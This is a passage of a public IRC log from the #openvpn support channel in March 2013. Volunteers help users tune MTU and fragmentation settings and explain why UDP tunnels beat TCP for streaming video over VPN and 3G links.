google.com seems to do the right thing. 8.8.8.8 replies only 64 bytes back, and kernel.org drops too large of pings 01:08 < TORcruzer> Okay well I'll verify that first. Do you think my other VPS would be a good thing to ping? 01:08 < TORcruzer> Okay, I'll do google.com 01:08 < pekster> Sure. Start with the VPN endpoint too 01:08 < TORcruzer> Okay 01:08 < pekster> At least verify the link works, then work out from there 01:09 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 01:14 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has quit [Ping timeout: 276 seconds] 01:20 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 256 seconds] 01:21 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 01:23 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 01:27 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 01:27 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has joined #openvpn 01:28 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has quit [Quit: WeeChat 0.4.0] 01:28 -!- TORcruze1 [~TORcruzer@gateway/tor-sasl/torcruzer] has joined #openvpn 01:28 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 01:29 < TORcruze1> Okay, so it seems the max is mss 548 01:30 < TORcruze1> It works with that. The way I found it was to just ping the server without going through OpenVPN. That was the highest it would let me go. So I set OpenVPN to fragment on that and It all seems to be working now :) 01:31 < TORcruze1> That dose seem really small though? Should I try OpenVPN higher then that? 01:32 < TORcruze1> It is hard to test, but It looks like I am getting 100KB/s more now. I should try turning on lzo commpression and I bet I'd see even more speed.... Correct? 01:32 < TORcruze1> ... More then with TCP 01:33 < TORcruze1> I am basicaly watching YouTube. When the video firt starts I am seeing a lot more speed. 01:34 < TORcruze1> ... I'll try those things and report back... 01:37 -!- TORcruze1 [~TORcruzer@gateway/tor-sasl/torcruzer] has quit [Quit: WeeChat 0.4.0] 01:57 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has joined #openvpn 01:58 < TORcruzer> YES :) I am sooo happy. Thank you for all your help. Boy I never would have figured that out. 01:59 < TORcruzer> On TCP I was seeing a max speed on the Tun interface of 257KB/s ... now on UDP with comp-lzo I am seeing a little over 400KB/s 02:00 < TORcruzer> Owe well nmon now shows Peak Receved 495KB/s !!! So cool. on TCP no joke. Peak Receved ~250-270KB/s 02:02 < TORcruzer> new peak 505KB/s :) ... Okay I'll stop posting now :p 02:11 < TORcruzer> Okay now 545KB/s Lots of peaking over 500KB/s... So, OpenVPN is Open Source... I should look into what it would take to add a config flag to have OpenVPN do this ping testing for you... Hum, I guess the problem would be that it would add a lot of time to starup.... Maybe I could just write a small Bash Script and put it in the Arch Linux AUR ...? 02:13 < pekster> Did you see/use --mtu-test? It does just that 02:14 < TORcruzer> Owe boy, really? 02:14 < pekster> Yup. I noted it earlier too 02:14 < TORcruzer> Shoot.. 02:16 < TORcruzer> Okay, well I'll sign off now. BIG Thank You pekster :) While I should have read you tell me about --mtu-test... Thanks for helping me figure this out. 02:17 < pekster> 548 seems oddly close to 576 minus some overhead (not sure offhand how much that all accounts for) 02:18 -!- PG1 [~PG@46.19.194.98] has joined #openvpn 02:18 < PG1> hello room 02:18 < pekster> It could be the host you're using (or some router en-route) somehow uses that as the MTU, although that's a goofy value since 576 is the unfragmented minimum packet size required to support in IPv4. Technically, IPv4 can work with an MTU as low as 68 bytes. It's valid to use such a low MTU, but not common 02:18 < TORcruzer> Owe ya, Frag needed and DF set (mtu = 576) 02:18 < pekster> Heh. Funny. 02:18 < PG1> can i transfer TCP packets (live stream) over a udp tunnel using openvpn? 02:18 -!- Voss [~Voss@unaffiliated/dionysus] has joined #openvpn 02:19 < pekster> I think someone mis-read or mis-understood the spec somewhere along your path. Oh well, it's not technically misconfigured if you get the fragmentation needed reply 02:19 -!- Voss [~Voss@unaffiliated/dionysus] has left #openvpn [] 02:19 < pekster> PG1: Yup, you can send any IP data (using tun) or Ethernet data (using tap) across the link 02:19 < PG1> pekster: and can that tunnel be encrypted? 02:19 < pekster> This applies equally to UDP or TCP as your encapsulating transport. Use of UDP is preferred for a variety of performance reasons 02:19 < pekster> Yup 02:20 < PG1> is it a good idea to send a live video websctream TCP based over a udp tunnel? 02:20 < PG1> tcp stream sent over a tcp tunnel is causing problems 02:20 < pekster> It's a good idea to use UDP always unless you cannot 02:20 < pekster> Righ 02:20 < pekster> !tcp 02:20 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 02:20 < TORcruzer> pekster: Awe, Okay, that sound right. Well. I'm getting good speeds, so I'm not too worried about it. When I get to school I'll set their network. 02:21 < TORcruzer> "Test their network" 02:23 < TORcruzer> pekster: Maybe my school has a diffrent route to my server 02:25 < pekster> Standard traceroute tools can often identify the MTUs along a path, depending on configuration 02:29 < TORcruzer> New Peak 736.5 KB/s over UDP :) Okay I am really signing off. I am just being noisy now... 02:29 < TORcruzer> Good by Thanks :) 02:29 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has quit [Quit: WeeChat 0.4.0] 02:32 < PG1> pekster: any documentation you can point me to ? 02:32 < pekster> !howto 02:32 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 02:33 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 248 seconds] 02:39 < PG1> pekster: in my case with streaming in tcp route or birdge mode would bebtter? 02:40 < pekster> Routing 02:40 < pekster> !tunortap 02:40 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 02:40 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 02:42 < PG1> pekster: i see that by default openvpn works on udp not tcp tunneling 02:42 < pekster> OpenVPN works with ether. The default is UDP, but nothing needs to change besides your configuration for it to "work" 02:59 < pekster> You can use any address space available to your environment. If you don't have a block of publicly-routable IPs, use RFC1918 space 02:59 < pekster> !1918 02:59 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi 03:41 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 03:44 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 03:45 -!- Orbi [~opera@anon-163-206.vpn.ipredator.se] has joined #openvpn 03:46 -!- PG1 [~PG@46.19.194.98] has quit [Ping timeout: 245 seconds] 03:56 -!- lmm [uid6417@gateway/web/irccloud.com/x-urrxqdulhckrxfpt] has quit [Ping timeout: 252 seconds] 03:56 -!- Perun [perun@chao5.net] has quit [Ping timeout: 252 seconds] 03:57 -!- Perun [perun@chao5.net] has joined #openvpn 04:01 -!- PG1 [~PG@141.138.184.245] has joined #openvpn 04:03 < PG1> on my openvpn server i am receiving this kind of error from time to time: read UDPv4 [ECONNREFUSED]: Connection refused (code=111 04:10 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Quit: nonotza] 04:23 < PG1> anyone? 04:26 -!- Perun [perun@chao5.net] has quit [Read error: Operation timed out] 04:27 -!- Perun [perun@chao5.net] has joined #openvpn 04:27 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-wclmhmpvxmgxurke] has quit [Ping timeout: 258 seconds] 05:10 < pppingme> PG1 might just be someone trying to port knock or something, are you seeing a real problem? 05:10 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 05:14 < PG1> pppingme: yes 05:15 < PG1> pppingme: what is port knock 05:16 -!- lmm [uid6417@gateway/web/irccloud.com/x-pdubufobwmodlaqn] has joined #openvpn 05:17 < pppingme> PG1 whats the problem you're seeing? 05:18 < PG1> pppingme: i am trying to do some livestreaming so i am using tcp over udp, what i see is when the client drops connection for like 1sec the stream stops even though the tunnel stays there 05:19 < PG1> so i have to refire the stream everytime 05:20 < pppingme> PG1 you're using UDP for the vpn, right? 05:20 < PG1> pppingme: yes 05:20 < pppingme> then your stream is TCP, right? 05:20 < PG1> pppingme: correct 05:20 -!- Orbi [~opera@anon-163-206.vpn.ipredator.se] has quit [Quit: Orbi] 05:21 < pppingme> in general, unless there's a good reason to do otherwise, streaming should be done via UDP, there's about a 1000 good reasons for that and hardly no good reasons to go UDP 05:21 < pppingme> but.. 05:21 < pppingme> setting that aside 05:21 < pppingme> if you do a nice long ping through the tunnel, does it run clean? 05:22 < PG1> well the cutoff is not seen, only the output freezes 05:22 < PG1> if i run a ping in parallel it would stay working 05:22 < pppingme> thats just a characteristic of how TCP works 05:23 < pppingme> so you don't see ANY packet loss when you ping? 05:24 < PG1> let me check 05:27 < PG1> pppingme: http://pastie.org/7088788 05:28 < PG1> you see thew lagtimes? 05:30 < pppingme> that just means something else is hitting the connection 05:31 < pppingme> you didn't post stats at the end of the ping? 05:31 < PG1> the weird thing is, the stream stops at the time the ping is very reliable and does no show any disconnections 05:31 < PG1> so for example stream stops when ping is 200ms 05:32 < pppingme> is there any dsl involved? 05:33 < PG1> 3g 05:34 < pppingme> streaming over tcp is bad to start with, you complicate that with a vpn and 3g, that just makes it worse, the thing about tcp is one little minor hickkup brings it to a halt until the issue (lost or corrupt packet or whatever happened) is corrected 05:35 < pppingme> thats fine if you're downloading a file, in fact, its probably desirable, since 100% accuracy is important, but when you're streaming video, who cares, worse case is you lose a frame of video, thats why UDP is better for streaming. 05:35 < pppingme> is there a reason you can't stream via udp? 05:36 < PG1> i want to cover the stream on all devices/platforms inclduing android iphone mac linux windows 05:36 < PG1> so my solutuon is fine now with tcp but i dont know if it will be fine with udp 05:36 < pppingme> as long as you stream over tcp, you're going to be fighting this issue 05:36 < PG1> lot of devices dont support udp streams 05:37 < pppingme> its not up to the device, its up to what software you're running on the device 05:38 < pppingme> and every major video player out there, as well as flash and a million other ways to do it can support streaming over udp 05:39 < pppingme> believe it or not, what you're seeing isn't a bug or really even an issue in most peoples eyes, its a feature, its the way TCP is supposed to work 05:41 < pppingme> every once in a while, you're going to lose a packet or a packet will come across corrupt, thats just a fact of life, thats what makes tcp so good, it can detect these situations and correct for it, but all of that takes time, but allows for extremely high accuracy when moving files around, but who cares when its for video or audio, no one is going to notice a missing frame.. 05:42 < pppingme> thus, UDP 05:42 -!- PG1 [~PG@141.138.184.245] has quit [Ping timeout: 256 seconds] 05:42 < jzaw> 1/24th of a second .. just a blink 05:42 < pppingme> he's gone 05:42 < jzaw> ah 05:43 < pppingme> I duno why people insist on streaming video over tcp over a vpn, over 3g 05:43 < jzaw> ive been running (am runnin) a tcp tunnel but only cos i found voip less artifacty than over udp 05:43 < jzaw> but im thinking of going to udp anyway 05:44 < jzaw> cos my sftp speeds are shit 05:44 < jzaw> even with tcp-nodelay 05:44 < pppingme> thats interesting.. 05:44 < pppingme> that you think voip sounds better over a tcp tunnel vs a udp tunnel.. 05:44 < jzaw> im 2,000km from my server ... and a lot of PL networks are PANTS! and very lossy 05:45 < jzaw> yeah 722 is a nice sounding codec when pkts are arriving 05:45 < jzaw> but its very sensitive to losses 05:45 < jzaw> quickly starts sounding very very bad 05:46 < pppingme> I mainly only do u-law 05:48 <@EugeneKay> pppingme - over the MOON 05:48 < jzaw> pppingme, aye but its a good litmus test to try 722 :) 05:51 * jzaw goes to flash a freshly baked openwrt bin to his tplink ... fingers crossed 05:55 -!- kisom [~kisom@n186-p13.kthopen.kth.se] has joined #openvpn 06:05 -!- tekzilla [~jon@24.134.142.157] has quit [Ping timeout: 256 seconds] 06:10 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 06:14 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 06:22 -!- tekzilla [~jon@24.134.142.157] has joined #openvpn 06:25 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-xkuztbndblojovtg] has joined #openvpn 06:31 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 06:31 -!- penk [~dave@216.142.113.157] has joined #openvpn 06:32 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 06:32 -!- mode/#openvpn [+o krzee] by ChanServ 06:36 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Main screen turn off] 06:37 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Remote host closed the connection] 06:41 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: testing nickserv before join] 06:41 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 06:41 -!- mode/#openvpn [+o krzee] by ChanServ 06:43 -!- penk [~dave@216.142.113.157] has quit [Ping timeout: 248 seconds] 06:50 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 07:01 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 07:04 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Main screen turn off] 07:10 -!- pyrobisqit [~pyrobisqi@208.68.39.44] has joined #openvpn 07:17 -!- pyrobisqit [~pyrobisqi@208.68.39.44] has quit [Quit: leaving] 07:23 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:30 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 07:34 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 07:36 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 07:47 -!- pyrobisq1t [~pyrobisqi@208.68.39.44] has joined #openvpn 07:48 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Main screen turn off] 07:48 -!- pyrobisq1t [~pyrobisqi@208.68.39.44] has quit [Client Quit] 07:49 -!- pyrobisqit [~pyrobisqi@208.68.39.44] has joined #openvpn 08:20 -!- zarrsh_ [~zarrsh@cpe-24-95-76-206.columbus.res.rr.com] has quit [Ping timeout: 245 seconds] 08:45 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 08:54 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 08:59 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer] 09:12 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 09:19 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has joined #openvpn 09:21 -!- batrick [~batrick@nmap/developer/batrick] has quit [Ping timeout: 252 seconds] 09:23 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:25 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn 09:30 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 09:32 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 10:08 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn 10:18 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 10:18 -!- kubbing_ [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn 10:19 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Ping timeout: 256 seconds] 10:20 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 264 seconds] 10:34 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 252 seconds] 10:34 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has quit [Ping timeout: 258 seconds] 10:36 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has joined #openvpn 10:45 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has quit [Ping timeout: 264 seconds] 10:48 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has joined #openvpn 10:51 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has quit [Max SendQ exceeded] 10:53 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has joined #openvpn 10:57 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has quit [Max SendQ exceeded] 10:59 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has joined #openvpn 11:01 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has quit [Max SendQ exceeded] 11:04 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has joined #openvpn 11:10 -!- emmanuelux [~emmanuelu@nl4.freedom-ip.com] has quit [Max SendQ exceeded] 11:10 -!- amir is now known as namir10 11:11 -!- namir10 is now known as namir7 11:11 -!- namir7 is now known as amir 11:14 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has joined #openvpn 11:38 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 11:38 -!- mode/#openvpn [+v s7r] by ChanServ 12:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 12:08 -!- Cubox [cubox@unaffiliated/cubox] has joined #openvpn 12:08 < Cubox> hi :) 12:08 < Cubox> I have a question about the android app. 12:08 < Cubox> In the notification bar, I have TWO openvpn things... 12:08 < Cubox> I know that one is VPNService, but how to remove the other? 12:29 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:30 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 12:35 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:35 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 245 seconds] 12:44 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 264 seconds] 12:45 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 12:46 -!- dfoolz [~Anon@fuge.it] has quit [Remote host closed the connection] 12:55 -!- mattock is now known as mattock_afk 13:02 -!- nikitosiusis [~nikitos@2a02:6b8:0:81f::189] has joined #openvpn 13:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 13:12 -!- lbalbalba [~lbalbalba@a80-100-229-127.adsl.xs4all.nl] has joined #openvpn 13:12 -!- lbalbalba [~lbalbalba@a80-100-229-127.adsl.xs4all.nl] has left #openvpn [] 13:19 -!- Dave2 is now known as Dave 13:46 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 276 seconds] 13:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds] 13:54 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:11 -!- kubbing_ [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Remote host closed the connection] 14:21 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:53 -!- dazo_afk is now known as dazo 14:56 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Quit: No Ping reply in 180 seconds.] 14:57 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 14:58 -!- dazo is now known as dazo_afk 15:07 -!- dazo_afk is now known as dazo 15:07 -!- dazo [~dazo@openvpn/community/developer/dazo] has quit [Quit: Ciao] 15:20 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Read error: Operation timed out] 15:27 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 15:31 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has quit [Quit: Have to go. Good bye!] 15:33 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 15:42 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 16:17 -!- master_o1_master [~master_of@p4FF244B8.dip.t-dialin.net] has joined #openvpn 16:17 -!- master_of_master [~master_of@p4FF24D8B.dip.t-dialin.net] has quit [Read error: Operation timed out] 16:21 -!- JSharpe_ [~JSharpe@ns264658.ovh.net] has joined #openvpn 16:25 -!- JSharpe [~JSharpe@ip5-63-150-164.lon.ukinetcom.net] has quit [Ping timeout: 252 seconds] 16:26 -!- JSharpe__ [~JSharpe@46.165.210.17] has joined #openvpn 16:30 -!- JSharpe_ [~JSharpe@ns264658.ovh.net] has quit [Ping timeout: 245 seconds] 16:30 -!- JSharpe__ is now known as JSharpe 16:50 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 17:14 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 17:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 17:25 -!- p3rror [~mezgani@41.249.129.50] has joined #openvpn 17:27 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer] 17:29 -!- EugeneKay [eugene@madeitwor.se] has quit [Ping timeout: 245 seconds] 17:29 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 245 seconds] 17:29 -!- APTX [APTX@unaffiliated/aptx] has quit [Remote host closed the connection] 17:29 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds] 17:30 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 245 seconds] 17:30 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 245 seconds] 17:30 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 245 seconds] 17:30 -!- kisom [~kisom@n186-p13.kthopen.kth.se] has quit [Ping timeout: 276 seconds] 17:30 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Ping timeout: 245 seconds] 17:30 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 17:30 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 17:32 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 17:32 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 17:33 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:33 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 17:33 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 258 seconds] 17:34 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 17:34 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 17:35 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 17:35 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 17:36 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 17:37 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 17:38 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 17:38 -!- kisom [~kisom@n186-p13.kthopen.kth.se] has joined #openvpn 17:38 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 246 seconds] 17:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 17:48 -!- Prolac [~rope@unaffiliated/prolac] has joined #openvpn 17:55 -!- mezgani [~mezgani@41.140.202.88] has joined #openvpn 17:59 -!- p3rror [~mezgani@41.249.129.50] has quit [Ping timeout: 264 seconds] 18:01 -!- mezgani [~mezgani@41.140.202.88] has quit [Read error: Operation timed out] 18:02 -!- p3rror [~mezgani@41.140.101.234] has joined #openvpn 18:10 -!- p3rror [~mezgani@41.140.101.234] has quit [Ping timeout: 246 seconds] 18:15 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 18:24 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 18:24 -!- mode/#openvpn [+o krzee] by ChanServ 18:25 -!- p3rror [~mezgani@adsl196-203-19-217-196.adsl196-9.iam.net.ma] has joined #openvpn 18:27 -!- Prolac [~rope@unaffiliated/prolac] has quit [Remote host closed the connection] 18:34 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 18:40 -!- p3rror [~mezgani@adsl196-203-19-217-196.adsl196-9.iam.net.ma] has quit [Quit: Leaving] 18:52 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 19:08 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 19:11 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:11 -!- Dave is now known as Dave2 19:19 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 19:24 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 19:54 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 20:42 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 20:44 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 255 seconds] 20:45 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 20:58 -!- sauce [sauce@unaffiliated/sauce] has quit [Quit: sauce] 20:59 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: Leaving] 21:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 21:05 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 21:05 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 21:07 -!- krzee [~k@openvpn/community/support/krzee] has joined #openvpn 21:07 -!- mode/#openvpn [+o krzee] by ChanServ 21:21 -!- noahmehl [~noahmehl@cpe-75-186-45-161.cinci.res.rr.com] has joined #openvpn 21:21 < noahmehl> i'm using openvpnas 21:22 < noahmehl> and I'm wondering how group permissions work in conjunction with ldap 21:22 < noahmehl> I can't find any documentation explaining how to use an ldap group as a group in openvpnas 21:22 < noahmehl> anyone have experience here? 21:24 < noahmehl> oh, there's a different room for this 21:24 < pekster> /TOPIC says: 21:24 < pekster> !as 21:24 < noahmehl> i'll post there 21:24 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 21:24 < pekster> :) 21:25 < noahmehl> already beat you to it ;) 21:30 -!- sauce [~sauce@ool-ad02ad20.dyn.optonline.net] has joined #openvpn 21:30 -!- sauce [~sauce@ool-ad02ad20.dyn.optonline.net] has quit [Changing host] 21:30 -!- sauce [~sauce@unaffiliated/sauce] has joined #openvpn 21:37 -!- krzee [~k@openvpn/community/support/krzee] has left #openvpn ["Leaving"] 21:59 -!- noahmehl [~noahmehl@cpe-75-186-45-161.cinci.res.rr.com] has quit [Quit: noahmehl] 22:07 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Ping timeout: 256 seconds] 22:09 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 22:23 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 22:35 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 22:35 -!- mode/#openvpn [+o krzee] by ChanServ 22:44 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 23:08 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Quit: nonotza] 23:21 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 23:25 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Client Quit] 23:26 -!- fluter [~fluter@fedora/fluter] has quit [Read error: Operation timed out] 23:27 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn --- Day changed Sun Mar 24 2013 00:00 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 00:01 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 00:03 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 240 seconds] 00:03 -!- 